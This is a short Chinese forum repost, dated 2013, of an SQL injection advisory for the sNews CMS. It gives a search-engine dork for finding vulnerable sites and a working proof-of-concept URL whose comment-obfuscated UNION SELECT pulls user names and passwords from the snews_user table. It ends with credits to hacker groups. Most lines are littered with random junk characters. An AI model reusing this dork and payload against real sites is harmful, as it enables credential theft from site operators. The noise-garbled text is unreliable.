标题: CMS snews SQL Injection Vulnerability
/ V9 L- g1 o# ]0 R% A作者: By onestree
4 j- i1 q' w" G O( r* L6 W下载地址 : http://snewscms.com/
+ j {5 E. [" C+ @* F7 a5 N% e# X测试平台 : ubuntu 12.10 / win 7
9 ]. D4 a. g$ k4 v关键词: inurl:"tanyakan pada rumput yang bergoyang"( c! D$ {% A8 g% l6 t8 g" C$ u- I
) I8 w" b: F& u6 U; g1 ]
8 q9 M1 V+ O0 e( f; Y6 ~- }3 j*************************************************************0 m2 Q/ s( K6 j; e3 A, @# o
% a& L2 R/ Z: [; k: `SQL poc:' V. U. b) Y4 D& n2 L2 I6 R6 i8 \
0 ^# H1 X- ]9 } R4 p# t3 r
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
! g% K" c! u1 _1 i+ l
2 |! C- K, P" B2 p示例4 Q n* h/ u9 f1 ]7 T
# ?/ j5 o0 o* N$ p
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
' F+ C1 L5 h+ D
" B( j6 S4 P/ Q* ~- M; q7 y) `" e& i
) R, ~! P9 H' n, o致谢:# N" n) e( b* K+ {* k) b) o
" Z+ t0 [$ [9 }
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell q1 p. f& n Y; [# p1 W/ V: w
" G7 c; x* T8 V( \: g
indonesiancoder - moeslimh4x0r - go-coder
; u+ r0 L/ {* S( k/ ?% y
2 [/ t5 G! n1 G* xspesial my hunny :*
) ~ L2 J" W, U9 U6 q: ~6 _0 w: H# ` |
发表于 2013-1-23 08:55:06
收藏
支持
反对